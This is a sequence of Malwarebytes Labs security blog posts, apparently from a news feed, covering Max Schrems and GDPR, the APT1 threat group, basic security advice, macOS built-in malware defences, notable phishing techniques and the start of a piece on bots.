Schrems argued that, when his data left EU borders, EU law required that it receive an “adequate level of protection.” Mass surveillance, he said, violated that.

The Irish Data Protection Commissioner disagreed. The described EU-to-US data transfer was entirely legal, the Commissioner said, because of Safe Harbor, a data privacy carve-out approved much earlier.

In 1995, the EU adopted the Data Protection Directive, which, up until 2018, regulated the treatment of EU citizens’ personal data. In 2000, the European Commission approved an exception to the law: US companies could agree to a set of seven principles, called the Safe Harbor Privacy Principles, to allow for data transfer from the EU to the US. This self-certifying framework proved wildly popular. For 15 years, nearly every single company that moved data from the EU to the US relied, at least briefly, on Safe Harbor.

Unsatisfied, Schrems asked the Irish High Court to review the Data Protection Commissioner’s inaction. In October 2013, the court agreed. Schrems celebrated, calling out the Commissioner’s earlier decision.

“The [Data Protection Commissioner] simply wanted to get this hot potato off his table instead of doing his job,” Schrems said in a statement at the time. “But when it comes to the fundamental rights of millions of users and the biggest surveillance scandal in years, he will have to take responsibility and do something about it.”

Less than one year later, the Irish High Court came back with its decision—the Court of Justice for the European Union would need to review Safe Harbor.

On March 24, 2015, the Court heard oral arguments for both sides. Schrems’ legal team argued that Safe Harbor did not provide adequate protection for EU citizen’s data. The European Commission, defending the Irish DPC’s previous decision, argued the opposite.

When asked by the Court how EU citizens might best protect themselves from the NSA’s mass surveillance, the lawyer arguing in favor of Safe Harbor made a startling admission:

“You might consider closing your Facebook account, if you have one,” said Bernhard Schima, advocate for the European Commission, all but admitting that Safe Harbor could not protect EU citizens from overseas spying. When asked more directly if Safe Harbor provided adequate protection of EU citizens’ data, the European Commission’s legal team could not guarantee it.

On September 23, 2015, the Court’s advocate general issued his initial opinion—Safe Harbor, in light of the NSA’s mass surveillance programs, was invalid.

“Such mass, indiscriminate surveillance is inherently disproportionate and constitutes an unwarranted interference with the rights [to respect for privacy and family life and protection of personal data,]” the opinion said.

Less than two weeks later, the entire Court of Justice agreed.

Ever a lawyer, Schrems responded to the decision with a 5,500-word blog post (assigned a non-commercial Creative Commons public copyright license) exploring current data privacy law, Safe Harbor alternatives, company privacy policies, a potential Safe Harbor 2.0, and mass surveillance. Written with “limited time,” Schrems thanked readers for pointing out typos.

The General Data Protection Regulation

Before the Court of Justice struck down Safe Harbor, before Edward Snowden shed light on the NSA’s mass surveillance, before Schrems received a 1,200-page PDF documenting his digital life, and before that fateful guest presentation in professor Glancy’s privacy seminar at Santa Clara University School of Law, a separate plan was already under way to change data privacy.

In November 2010, the European Commission, which proposes legislation for the European Union, considered a new policy with a clear goal and equally clear title: “A comprehensive approach on personal data protection in the European Union.”

Many years later, it became GDPR.

During those years, the negotiating committees looked to Schrems’ lawsuits as highly informative, Glancy said, because Schrems had successfully proven the relationship between the European Charter of Fundamental Human Rights and its application to EU data privacy law. Ignoring that expertise would be foolish.

“Max [Schrems] was a part of just about all the committees working on [GDPR]. His litigation was part of what motivated the adoption of it,” Glancy said. “The people writing the GDPR would consult him as to whether it would solve his problems, and parts of the very endless writing process were also about what Max [Schrems] was not happy with.”

Because Schrems did not respond to multiple interview requests, it is impossible to know his precise involvement in GDPR. His Twitter and blog have no visible, corresponding entries about GDPR’s passage.

However, public records show that GDPR’s drafters recommended several areas of improvement in the year before the law passed, including clearer definitions of “personal information,” stronger investigatory powers to the EU’s data regulators, more direct “data portability” to allow citizens to directly move their data from one company to another while also obtaining a copy of that data, and better transparency in how EU citizens’ online profiles are created and targeted for ads.

GDPR eventually became a sweeping set of 99 articles that tightly fasten the collection, storage, use, transfer, and disclosure of data belonging to all EU citizens, giving those citizens more direct control over how their data is treated.

For example, citizens have the “right to erasure,” in which they can ask a company to delete the data collected on them. Citizens also have the “right to access,” in which companies must provide a copy of the data collected on a person, along with information about how the data was collected, who it is shared with, and why it is processed.

Approved by a parliamentary vote in April 2016, GDPR took effect two years later.

GDPR’s immediate and future impact

On May 23, 2018, GDPR’s arrival was sounded not by trumpets, but by emails. Facebook, TicketMaster, eBay, PricewaterhouseCoopers, The Guardian, Marriott, KickStarter, GoDaddy, Spotify, and countless others began their public-facing GDPR compliance strategies by telling users about updated privacy policies. The email deluge inspired rankings, manic tweets, and even a devoted “I love GDPR” playlist. The blitz was so large, in fact, that several threat actors took advantage, sending fake privacy policy updates to phish for users’ information.

Since then, compliance looks less like emails and more like penalties.

Early this year, Google received its €50 million ($57 million) fine out of France. Last year, a Portuguese hospital received a €400,000 fine for two alleged GDPR violations. Because of a July 2018 data breach, a German chat platform got hit with a €20,000 fine. And in the reported first-ever GDPR notice from the UK, Canadian political consultancy—and murky partner to Cambridge Analytica—AggregateIQ received a notice about potential fines of up to €20 million.

To Noyb, the fines are good news. Gaëtan Goldberg, a privacy lawyer with the NGO, said that data privacy law compliance has, for many years, been lacking. Hopefully GDPR, which Goldberg called a “major step” in protecting personal data, can help turn that around, he said.

“[We] hope to see strong enforcement measures being taken by courts and data protection authorities around the EU,” Goldberg said. “The fine of 50 [million] euros the French CNIL imposed on Google is a good start in this direction.”

The future of data privacy

Last year, when Senator Warner told Zuckerberg that “the era of the Wild West in social media is coming to an end,” he may not have realized how quickly that would come true. In July 2018, California passed a statewide data privacy law called the California Consumer Privacy Act. Months later, three US Senators proposed their own federal data privacy laws. And just this month, the Government Accountability Office recommended that Congress pass a data privacy law similar to GDPR.

Data privacy is no longer a concept. It is the law.

In the EU, that law has released a torrent of legal complaints. Hours after GDPR came into effect, Noyb lodged a series of complaints against Google, Facebook, Instagram, and WhatsApp.

Goldberg said the group’s legal complaints are one component of meaningful enforcement on behalf of the government. Remember: Google’s massive penalty began with an investigation that the French authorities said started after it received a complaint from Noyb.

Separately, privacy group Privacy International filed complaints against Europe’s data-brokers and advertising technology companies, and Brave, a privacy-focused web browser, filed complaints against Google and other digital advertising companies.

Google and Facebook did not respond to questions about how they are responding to the legal complaints. Facebook also did not respond to questions about its previous legal battles with Schrems.

Electronic Frontier Foundation International Director Danny O’Brien wrote last year that, while we wait for the results of the above legal complaints, GDPR has already motivated other privacy-forward penalties and regulations around the world:

“In Italy, it was competition regulators that fined Facebook ten million euros for misleading its users over its personal data practices. Brazil passed its own GDPR-style law this year; Chile amended its constitution to include data protection rights; and India’s lawmakers introduced a draft of a wide-ranging new legal privacy framework.”

As the world moves forward, one man—the one who started it all—might be conspicuously absent. Last year, Schrems expressed a desire to step back from data privacy law. If anything, he said, it was time for others to take up the mantle.

“I know I’m going to be deeply engaged, especially at the beginning, but in the long run [Noyb] should absolutely not be Max’s personal NGO,” Schrems told The Register in a January 2018 interview. Asked to clarify about his potential future beyond privacy advocacy, Schrems said: “It’s retirement from the first line of defense, let’s put it that way… I don’t want to keep bringing cases for the rest of my life.”

Surprisingly, for all of Schrems’ public-facing and public-empowering work, his interviews and blog posts sometimes portray him as a deeply humble, almost shy individual, with a down-to-earth sense of humor, too. When asked during a 2016 podcast interview if he felt he would be remembered in the same vein as Edward Snowden, Schrems bristled.

“Not at all, actually,” Schrems said. “What I did is a very conservative approach. You go to the courts, you have your case, you bring it and you do your thing. What Edward Snowden did is a whole different ballgame. He pretty much gave up his whole life and has serious possibilities to some point end up in a US prison. The worst thing that happened to me so far was to be on that security list of US flights.”

During the same interview, Schrems also deflected his search result popularity.

“Everyone knows your name now,” the host said. “If you Google ‘Schrems,’ the first thing that comes up is ‘Max Schrems’ and your case.”

“Yeah but it’s also a very specific name, so it’s not like ‘Smith,’” Schrems said, laughing. “I would have a harder time with that name.”

If anything, the popularity came as a surprise to Schrems. Last year, in speaking to Bloomberg, he described Facebook as a “test case” when filing his original 22 complaints.

“I thought I’d write up a few complaints,” Schrems said. “I never thought it would create such a media storm.”

Glancy described Schrems’ initial investigation into Facebook in much the same way. It started not as a vendetta, she said, but as a courtesy.

“He started out with a really charitable view of [Facebook],” Glancy said. “At some level, he was trying to get Facebook to wake up and smell the coffee.”

That’s the Schrems that Glancy knows best, a multi-faceted individual who makes time for others and holds various interests. A man committed to public service, not public spotlight. A man who still calls and emails her with questions about legal strategy and privacy law. A man who drove down the California coast with some friends during spring break. Maybe even a man who is tired of being seen only as a flag-bearer for online privacy. (He describes himself on his Twitter profile as “(Luckily not only) Law, Privacy and Politics.)

“At some level, he considers himself a consumer lawyer,” Glancy said. “He’s interested in the ways in which to empower the little guy, who is kind of abused by large entities that—it’s not that they’re targeting them, it’s that they just don’t care. [The people’s] rights are not being taken account of.”

With GDPR in place, those rights, and the people they apply to, now have a little more firepower.

The post Max Schrems: lawyer, regulator, international man of privacy appeared first on Malwarebytes Labs.

Categories: Techie Feeds

The Advanced Persistent Threat Files: APT1

Malwarebytes - Fri, 02/22/2019 - 17:59

We’ve heard a lot about Advanced Persistent Threats (APTs) over the past few years. As a refresher, APTs are prolonged, aimed attacks on specific targets with the intention to compromise their systems and gain information from or about that target.

While the targets may be anyone or anything—a person, business, or other organization—APTs are often associated with government or military operations, as they tend to be the organizations with the resources necessary to conduct such an attack. Starting with Mandiant’s APT1 report in 2013, there’s been a continuous stream of exposure of nation-state hacking at scale.

Cybersecurity companies have gotten relatively good at observing and analyzing the tools and tactics of nation-state threat actors; they’re less good at placing these actions in context sufficient enough for defenders to make solid risk assessments. So we’re going to take a look at a few APT groups from a broader perspective and see how they fit into the larger threat landscape.

Today, we’re looking at APT1. (Note: These groups have a panoply of different names, but for simplicity’s sake, we’re going to borrow Mandiant’s naming conventions for Chinese groups.)

Who is APT1?

APT1 has been identified by various parties as unit 61398 of the People’s Liberation Army. They were one of the first APT groups to be publicly named, in a report released by Mandiant (now owned by FireEye) in 2013. APT1 was noted for wide scale and high volume collection, targeting roughly 150 mostly English-speaking companies at time of reporting.

Targeting industries noted as internal development areas by China’s 12th 5 year plan, APT 1 was notable in contrast to more familiar threat groups by their persistence (average observed persistence on target was 356 days), and their ability to compromise a target using multiple attack vectors.

Malware commonly deployed

APT1 is known for deploying the following malware:

  • Poison Ivy
  • Custom backdoors delivered by spear phish
  • Mimikatz
  • SeaSalt

NOTE: It’s generally inappropriate to attribute an attack based solely on the malware deployed. APT actors do not operate in a vacuum; they’re capable of collaborating with each other, as well as selling malware to other groups upon conclusion of an ops cycle.

Should you be worried?

Probably not. After a catastrophic OPSEC failure like the Mandiant report, it’s highly unlikely that the group still exists in the form originally disclosed. Disclosure of specific threat actors in the unit, as well as the unit’s physical location and infrastructure, eroded their counterintelligence posture such that it would be difficult to continue network operations without significant changes.

In 2015, President Obama and Xi Jinping met to discuss how both countries would address cyber espionage. Since that time, broad spectrum indiscriminate collection of the type APT1 engaged in has since waned in favor of targeted attacks, or upstream targeting of service providers to high value targets. If you do not belong to a cleared government contracting company, a large scale telecom, or a law firm providing services to either of the above, you most likely do not face a significant threat from any Chinese APT group.

What might they do next?

Probably not much, due to both political priority changes, and counterintelligence failures exposing experienced operators. However, in October 2018, Mcafee released a report on code reused from an APT1 backdoor employed to launch attacks against targets in the US, South Korea, and Canada. Differences in TTPs suggest this is not an APT1 operation, but instead a new campaign that is reusing old code from a variety of sources.

Given that APT1 themselves were no longer able to operate with impunity, it seems reasonable that they would disseminate tools to threat actor groups with better counterintelligence postures.

Additional resources

Mandiant report on APT1

Mysterious return of years-old Chinese malware

IOC samples historically associated with APT1

The post The Advanced Persistent Threat Files: APT1 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

The lazy person’s guide to cybersecurity: minimum effort for maximum protection

Malwarebytes - Thu, 02/21/2019 - 17:00

Are you tired of that acquaintance who keeps bugging you with computer questions? Do you avoid visiting certain people because you know you will spend most of the evening cleaning up their machine?

My uncle Bob is one of those people. He’s a nice guy, but with computers, he’s not just an accident waiting to happen—he’s an accident waiting to become a catastrophe. To keep Uncle Bob’s computer safe without blowing up the Internet, we need to give him the simplest of instructions that result in protecting him against as much as possible. Uncle Bob needs a lazy person’s guide to cybersecurity.

It’s not that Uncle Bob is lazy. It’s that he’s overwhelmed by the amount of stuff he has to do to keep his data and devices secure. Multiple passwords, reading through EULAs, website cookies that he clicks “agree” to without really paying attention—they’re giving him a serious case of security fatigue. And as his helper, you’re probably pretty over it, too.

The funny thing is, with adequate cybersecurity, Uncle Bob’s—and by extension all of our—problems would be much less frequent and less severe. So, let’s see if we can work out a system of minimum effort that renders reasonable results.

Before we begin, we will should note that lazy cybersecurity should not apply to devices used to store sensitive data, conduct financial transactions, or communicate confidential or proprietary information. Lazy security is a good way to protect those who prefer to do nothing rather than be overwhelmed by 50 somethings, but it shouldn’t have severe consequences if it goes wrong.

User education

Your first step should always be user education. So many of today’s most dangerous threats are delivered through social engineering, i.e., by tricking users into giving up their data or downloading the malware themselves from an infected email attachment. Therefore, knowing what not to click on and download can keep a good portion of threats off a lazy person’s device.

With most people, it helps to know why they shouldn’t download or click on links in emails that look like they came from a legitimate institution. Just telling them “don’t do that” may help for a bit, but advice is better retained if it’s grounded in practical reasoning. Therefore, each item in this list is accompanied by a brief explanation.

  • Do not click on links asking to fill out your personal information. Your financial institutions will not send emails with links to click, especially if those links are asking you to update personally identifiable information (PII). If a website promises you something in return for filling out personal data, they are phishing. In return for your data, you will probably get lots more annoying emails, possibly an infection, and no gift.
  • Don’t fall for too-good-to-be-true schemes. If you get offered a service, product, game, or other tantalizing option for free, and it is unclear how the producers of said service or item are making money, don’t take it. Chances are, you will pay in ways that are not disclosed with the bargain, including sitting through overly-obnoxious ads, paying for in-game or in-product purchases, or being bombarded with marketing emails or otherwise awful user experiences.
  • Don’t believe the pop-ups and phone calls saying your computer is infected. Unsolicited phone calls and websites that do so are tech support scams. The only programs that can tell if you have an infection are security platforms that either come built into your device or antivirus software that you’ve personally purchased or downloaded. Think about it: Microsoft does not monitor billions of computers to call you as soon as they notice a virus on yours.
  • Don’t download programs that call themselves system optimizers. We consider these types of software, including driver updaters and registry cleaners, potentially unwanted programs. Why? They do nothing helpful—instead, they often take over browser home pages, redirect to strange landing pages, add unnecessary toolbars, and even serve up a bunch of pop-up ads. While not technically dangerous themselves, they let a lot of riff raff in the door.
  • Never allow web push notifications. I have yet to find a useful reason for these, beyond advertising.

Beyond staying away from “allow” and “download” buttons, and steering clear of links asking for PII, users who conduct any kind of financial transaction on their machines, be it online shopping or banking, should approach those transactions with extreme caution. Here’s where we ask users to take action, looking for security clues and doing a little research before paying that bill or buying that new book.

  • Use a designated browser you trust. This needn’t be for all surfing, but for purchasing especially, research the different browsers and see which one you feel safest with, whether that’s because they have few vulnerabilities, don’t track your surfing behavior, or encrypt all communication. Major browsers such as Firefox, Safari, and Chrome have strengths and weaknesses they bring to the game, so it’s a matter a personal preference. We do suggest staying away from older browsers rife with security holes, such as Internet Explorer.
  • Look for HTTPS and the green padlock. No, it’s no longer a guarantee that the site is safe just because it has a green padlock, but it does mean the communication is encrypted. If you combine that with being on the true website of a trusted vendor, you can breathe easier knowing your payment details cannot be intercepted in transit.
  • Use a password manager. Simple as that. Passwords are a real problem, as users tend to re-use the same ones across multiple accounts, keep old ones laying around because they’re the only ones they can remember, or write them down somewhere they can be easily found. No need for 27 different passwords. Just one manager, preferably with multi-factor authentication. (Bonus points for healthcare or bank organizations with logins that use physical or behavioral biometrics.)

This could turn out to be too confusing for the Uncle Bobs of this world, however. If so, best to point them in the direction of brick-and-mortar stores for shopping, the checkbook for paying bills, and the actual bank to conduct other financial business.

How to set up a system for a non-tech-savvy person

Perhaps Uncle Bob can only manage so much security education before feeling overburdened with technical knowledge. In that case, it helps for a tech-savvy friend or relative to pitch in and tighten up a few things on the backend.


First of all, if someone is looking for a new computer for non-sensitive purposes, such as browsing, social media, games, and some basic email or chat functions, you can chime in with recommendations. For someone not invested in heavy gaming, a Chromebook would be a good option, as it will save them some money and can perform all those functions, plus any browser-based gaming. However, someone with an interest in PC gaming will likely need an entirely different OS and an intense graphics card (and therefore lots of protection against cryptominers). Meanwhile, Macs are good options for users looking to get into graphic design.


Installing software on a system usually comes with the task of having to keep it up-to-date. Therefore, any software programs that Uncle Bob selects should minimize the potential pitfalls.

When Uncle Bob is shopping for software, recommend he finds programs that have a self-updating function. We know this isn’t always recommended in a work environment, but for the lazy security person, it’s perfect. One less thing to worry about.

In addition, selecting software that allows users to minimize notifications to only dire warnings will keep Uncle Bob from getting confused. Notifications coming from programs can have strange effects on the less computer savvy for several reasons:

  • They don’t understand to which program they belong, which takes away the context for them.
  • The text in the notifications is designed to be short, not always maximized for clarity.
  • Technical terms used in the notification are unknown to the receiver.

Their reactions may vary. Some will simply click until they disappear. This is the behavior that usually gets them into trouble, so you don’t want to give them another reason to click–click–click away. Others may get worried and call for backup immediately, asking what’s wrong and why they are getting this “pop-up.” So, any software that can be set to only issue a warning when something is really amiss deserves another plus.

Browser add-ons

There are some secure browsers out there that value your privacy, but I’m pretty sure my Uncle Bob does not like using them. There is a learning curve involved that may not seem steep to you and me, but my uncle Bob…you know what I mean. But there is hope on the horizon. Some of the more user-friendly browsers can be equipped with extensions/add-ons/plugins that boost security by adding an extra protective layer.

There are browser extensions that can make your browser more secure by:

Read: How to tighten security and increase privacy on your browser

It’s a fine line

Everyone deserves to experience a safe Internet, but unfortunately, this is not always easy to accomplish. Peoples’ skill-sets and levels of experience differ, as does their tolerance for bad news—or any news at all! What comes naturally to some can be downright overwhelming for others. While you might wish that Uncle Bob could have his computer license revoked, it’s better to sit him down and show him basic survival skills—all the better to not only protect himself, but others from dangers lurking on the web.

And if you go that one step further and help those less tech-savvy folks in your life by setting up some automated support in the background, you’ll save them time and and money having to run repairs or clean up an infected machine.

We always sign off by telling our readers to stay safe. This time, stay safe…and help your friends do the same.

The post The lazy person’s guide to cybersecurity: minimum effort for maximum protection appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How does macOS protect against malware?

Malwarebytes - Thu, 02/21/2019 - 16:00

Mac users often are told that “Macs don’t get viruses.” This is not really true, of course. Macs can and do get infected. However, it is true that macOS provides some basic protection against malware. This protection can be quite effective in some ways, but, unfortunately, quite ineffective in others. Let’s take a look at how macOS features protect you from malware, and how malware can get past these features.


macOS has a feature that is called Quarantine. Any time a file is downloaded from the Internet, it gets marked with a Quarantine “flag.” When you try to open a downloaded app with this flag set, macOS will kick off a whole bunch of checks.

If all of those checks are successful, macOS will display a message alerting you that you’re opening an application downloaded from the Internet, which you’ll have to allow if you want to use the file. (macOS flashes this message to users to display the true nature of the file, in case it was disguised as another type, for example, an app disguised as a document.)

Once the app has been opened successfully for the first time, the Quarantine flag is removed, and these checks won’t be repeated again.

Some of the other protection features in macOS depend on Quarantine, and unfortunately, there are some ways that apps can get onto your hard drive without being marked with a Quarantine flag. Some examples:

  • Not all apps will properly set a Quarantine flag on files they download; torrent apps and malicious downloaders are two good examples.
  • Copying an app to another Mac after the Quarantine flag has been removed will result in the app not being quarantined on the second Mac.
  • Copying a file to a non-Mac file share or a USB flash drive that is not Mac formatted will result in the Quarantine flag being lost.
  • Vulnerabilities that enable creation of files without going through legitimate download methods allow for flagless apps on the hard drive.

Rewind back to when an app is downloaded from the Internet, and a Quarantine flag has been planted. The first of the checks conducted on a quarantined app is a check of the app’s code signature.

A code signature is a bit of cryptographic data that identifies the creator of the app and can be used to determine whether the app has been tampered with. It depends on a certificate obtained from Apple, as part of a $99 developer account.

If the code signature indicates that the app has been tampered with, or that the certificate used to create the signature has been revoked by Apple, macOS won’t allow the app to run at all.

Unfortunately, Gatekeeper is not infallible, and its biggest weakness is Quarantine itself. Gatekeeper checks do not happen for apps that are not quarantined, which includes apps that were quarantined, but have already been opened at least once and are thus no longer quarantined.

This means that an innocent-looking app could download all kinds of malicious processes in the background once installed, and those processes would not be subject to Gatekeeper checks. Similarly, if you had run a malicious app on your computer, and some time later Apple revoked the developer certificate used for its code signature, the app would continue to run on your Mac because code signature checks only happen for quarantined apps as part of Gatekeeper.

This also means that malware could maliciously modify apps on your Mac, which would make the malware devilishly hard to find and remove.


A hidden feature of the system that you’d never know was there, XProtect is a basic anti-malware feature also tied to Quarantine. XProtect has a relatively small number of rules for identifying known malicious apps, and every quarantined app that you attempt to open is run past XProtect first. If it matches any of the rules, macOS will not allow you to open it.

XProtect suffers from the same problems as Gatekeeper, in that it can’t protect against anything that doesn’t have a Quarantine flag. There’s a bigger problem, however: at the time of this writing, the most recent rule added to XProtect was on March 13, 2018. So it’s missing rules for nearly an entire year of new malware! The future of XProtect is unclear, but it’s definitely not protecting you against current threats.

Malware Removal Tool

In 2012, a series of attacks on macOS through vulnerabilities in Java resulted in malware being installed simply by visiting a website. Since this bypassed Quarantine, it was not something that the security measures in macOS at that time were equipped to deal with. Thus, Apple silently created the Malware Removal Tool, or MRT.

The MRT is a black box. Nobody really knows exactly how or when it works, and it runs silently, without any notifications to the person using the computer. Its sole purpose is to remove known malware that has gotten onto the computer.

Like XProtect, MRT recognizes only known malware via what appear to be hard-coded rules inside the MRT code. Nobody really knows how those rules work, and lately Apple has taken to obfuscating the malware name strings in the MRT code, so we can’t tell what it’s capable of detecting, either.

There’s no malware called OSX.28a9883.A, but that’s what Apple’s calling it

Unfortunately, MRT has not seen many updates lately that can be identified easily. Because it’s such a black box, it’s impossible to know, but it certainly doesn’t look like it is capable of detecting much recent malware.

System Integrity Protection

Abbreviated as SIP, this feature protects the core system files from modification. Also referred to as “rootless,” this SIP works by preventing all users, including the all-powerful root user, from changing a large number of restricted files on the system. Only certain pieces of Apple software can make changes to these files. This feature can only be turned off by rebooting the computer into recovery mode and entering an arcane command in the Terminal, which is not something the average person is likely to do.

Although SIP caused problems for some software at the time of its introduction, it has proven to be an excellent security measure, ensuring that the system files cannot be tampered with.

thomas$ sudo mkdir /System/blah Password: mkdir: /System/blah: Operation not permitted

As a result, some people believe that SIP plays a role in preventing malware from infecting Macs. Unfortunately, that’s not the case. Even before SIP, only some malware made changes to the files that are now protected by SIP. Malware can infect a Mac quite easily without doing that, and without even needing root permissions. This means SIP does nothing to prevent malware from invisibly infecting your Mac if you make the mistake of opening the wrong app.

Transparency, Consent, and Control

This mouthful is shortened simply to TCC, and it is a new feature of macOS 10.14 (Mojave). TCC protects certain user data against outside access, with the goal of preventing apps from surreptitiously doing things like slurping up your web browsing history.

This is a noble goal, but despite its short life so far, TCC has had some issues. These range in seriousness from a proliferation of permission request dialogs that can cause “dialog fatigue” to vulnerabilities that could allow apps to reach right past TCC and get access to the data anyway.

An example of a TCC dialog. Many people will just click OK to make it go away.

TCC does not prevent malware infection itself. However, it does—when working correctly—prevent malware from gaining access to some of your data. Don’t get too comfortable, though, as malware is still gobbling up unprotected data, such as passwords and credit cards stored in Chrome’s autofill, which is not covered by TCC.

My brain is exploding! What does all this mean?

The good news is that Apple is constantly working on making macOS a safer place. Although security experts are quick to point out holes in the protection features in macOS, your Mac is definitely more secure with them than without them.

However, it’s important to keep in mind that each and every one of these protections does have holes. Malware creators know exactly where those holes are, and are adept (some of them, anyway) at exploiting them. So don’t let your guard down.

In the security world, we like to talk about layers of protection. Having multiple layers is good practice, because if malware gets beyond one or two, it can still be blocked by another layer. With the various holes in current protection features, it makes sense to add another layer of protection to your Mac, such as antivirus software.

Malwarebytes for Mac, for example, can help to plug holes by detecting current threats that XProtect and MRT don’t. With the newly-introduced App Block feature, it can also help plug the holes in Gatekeeper.

So knowing what your Mac is capable of protecting against on its own and where it needs assistance can keep you more secure, whether you’re downloading apps from the Internet or simply taking an extra second to read through those dialog boxes.

The post How does macOS protect against malware? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Sophisticated phishing: a roundup of noteworthy campaigns

Malwarebytes - Wed, 02/20/2019 - 19:21

Phishing is a problem nearly as old as the Internet. Yet, criminals continue to reach into their bag of phishing tricks in 2019 because, in a nutshell, it just works. Dialing into the human psyche and capitalizing on emotions such as fear, anxiety, or plain laziness, phishing attacks are successful because they take aim at our weaknesses and exploit them—in much the same way an exploit kit takes advantage of a vulnerability in a software program.

To understand why phishing attacks continue to work, we look to cutting-edge tactics devised by threat actors to obfuscate their true intentions and capitalize on basic negligence. To that end, we’ve put together a roundup of noteworthy, out-of-the-box phishing campaigns of the last year. Here are the attacks that stood out.

You can’t easily dismiss this one

Myki, makers of the top-rated password manager with the same name, recently discovered a deceptive Facebook phishing scam that is so utterly convincing that it piqued the interest of security researchers.

The hullabaloo began when the company started receiving multiple reports from users that their Myki password manager was refusing to automatically fill a Facebook pop-up window on sites they visited, citing this as a bug.

After further investigation, Myki security researchers realized that it wasn’t a bug, and, in fact, their product was protecting their clients from trusting the purported Facebook pop-up. Below is a video demo of the phishing campaign they were able to unearth and successfully reproduce:

Video demo (Courtesy of Myki)

“[The] Hacker designs a very realistic-looking social login pop-up prompt in HTML,” wrote Antoine Vincent Jebara, Co-founder and CEO of Myki, in a blog post. “The status bar, navigation bar, shadows, and content are perfectly reproduced to look exactly like a legitimate login prompt.”

The fake pop-up looks and feels so real that users can drag and dismiss it like one could with a legitimate pop-up. But while it brings a convincing level of legitimacy to the attack, the pop-up gives the game away once users attempt to drag it out of the page, which can’t happen because the parts touching the edge of the browser window disappear, making users realize that the pop-up is part of the web page itself.

So, the next time you notice that your password manager is acting funny—like, not pre-filling on pop-up windows as you know it’s supposed to—try dragging the pop-up away from your browser. If a section (or mostly all) of it disappears after reaching the browser’s edge, it’s a fake pop-up. Close the page tab immediately!

Phishing by a thousand characters

By any sane standard, a 400- to 1,000-character long URL is overkill. Yet this didn’t stop a phisher from using it in his/her campaign. Not just once but in multiple instances in a phishing campaign email—much to the annoyance of clever recipients.

Screenshot of the kilometric long URL used in the campaign (Courtesy of MyOnlineSecurity)

The extracted URL above was taken from an email purporting to be a notification from the recipient’s email domain, telling them that their account was blacklisted due to multiple login failures. It then instructed recipients to upgrade and verify their email account before the service provider suspends or terminates the account.

No one knows for sure why someone would be crazy enough to attempt this. By now, fraudsters known there are better, more sustainable ways of obfuscating URLs. But alas, hardworking phishers are still out there. It’s not easy copying and pasting all those characters, after all, much less manually typing them out.

Let’s give them an A for effort, shall we? Nevertheless, phishing is no laughing matter, so let’s keep an eye on this one.

(Not) lost in (Google) translation

Online translation services were designed to serve one purpose: translate content from its original language to another. Who would have expected that phishers could use a legitimate Google Translate page as the landing page for users they’re attempting to own?

Screenshot of the phishing email (Courtesy of Akamai)

To: {recipient}
From: Security Accounts <facebook_secur@hotmail[.]com>
Subject: Security Alert
Message body:

Connecting to a new device


A user has just signed in to your Google Account from a new Windows device. We are sending you this email to verify that it is you.

[Consult the activity]

‘Why do this?’ you might wonder. According to Larry Cashdollar, Senior Security Response Engineer from Akamai, in a blog post, “Using Google Translate does some things; it fills the URL (address) bar with lots of random text, but the most important thing visually is that the victim sees a legitimate Google domain. In some cases, this trick will help the criminal bypass endpoint defenses.”

He also noted that this kind of tactic could be accepted by targets without suspicion when viewed on a mobile device, as the phishing email and landing page appear more legitimate. When viewed on a laptop or desktop, however, the flaws of this tactic are glaring.

Cashdollar mentioned that this phishing campaign is a two-prong attack, wherein phishers aimed at harvesting Google credentials first and then Facebook credentials next. The domain for the fake Facebook login is not hosted on a Google Translate page, mind you.

“…it’s highly uncommon to see such an attack target two brands in the same session,” Cashdollar further wrote.

For users to avoid falling for such a phish, Cashdollar has this to say: “The best defense is a good offense. That means taking your time and examining the message fully before taking any actions. Does the “from” address match what you’re expecting? Does the message create a curious sense of urgency, fear, or authority, almost demanding you do something? If so, those are the messages to be suspicious of, and the ones most likely to result in compromised accounts.”

Where did the quick brown fox go?

Unfortunately, it was replaced by letters placed in locations they weren’t supposed to so phishers could hide the source code of their landing page to make it look less suspicious.

This was what our friends at Proofpoint found when they encountered a campaign that leveraged custom font files for decoding and hiding content.

This particular phishing attack started off as an email purporting to originate from a major US bank, and when users clicked the link in the email, they were directed to a convincing replica of the bank’s official page, ready and waiting to receive credential input.

The custom font files, namely woff and woff2, installed a substitution cipher, which then replaced the letters users see on the page with other letters in the source code via direct character substitution. So, the text “The quick brown fox…” seen in the normal font file, for example, was “Eht wprcx bivqn fvk…” in the custom font file.

Screenshot of the woff font file (Courtesy of Proofpoint)

Proofpoint noted that the phishing kit may have been available since May 2018, if not earlier.

To combat this tactic and the others noted in this roundup, users must continue sticking to established safe computing protocols, such as not clicking links of emails that are suspicious and visiting bank websites directly from the browser instead of via email.

Businesses can also stay on top of less obvious phishing attacks by incorporating them into employee training programs. Any good anti-phishing plan will use techniques currently being used in the wild (whereas the Nigerian Prince, while still out there, is probably not one you still need to train on.)

As always, stay safe, and stay informed!

The post Sophisticated phishing: a roundup of noteworthy campaigns appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Good bots, bad bots: friend or foe?

Malwarebytes - Wed, 02/20/2019 - 16:00

One of the most talked about technologies online today is the ubiquitous bot. Simultaneously elusive yet also responsible for all of civilisation’s woes, bots are a hot topic of contention. If we went purely by news reports, we’d assume all bots everywhere are evil, and out to get us (or just spreading memes). We’d also assume every single person we ever disagreed with online is a bot. 

It might surprise you to learn that not all bots are bad. You may only hear about the negatives, but they can be a genuine form of assistance for both people at home and in the workplace.

First, let’s pin down exactly what a bot is (and isn’t).

What is a bot?

Good question.

Bots, as we understand them, perform basic or complex tasks at a speed much faster than we humans can. They’re often there to prop up the bits of a process that humans can’t get to, keeping the plates spinning on our behalf.

The ones you’ve probably heard doing good deeds are search engine web crawlers, chatbots in Skype, Slack, or various forms of instant messaging, and even front line support queries for businesses.

The rest? Those could be bad, but their mileage may vary. More areas of business depend upon bots than you may think, and they’re increasingly being used for all manner of tasks. Some benefit people at home, others simply benefit the organisation running them. However they stack up, we’re going to look at some of the more common ones and give you some things to think about. If you’re putting your own bot together, we hope this will help.


Crawlers do exactly what the name suggests: they crawl. They weave their merry way across the Internet, grabbing, analysing, and cataloguing unimaginable amounts of data daily. Without them going about their business, many things we take for granted simply wouldn’t function as well as they do.

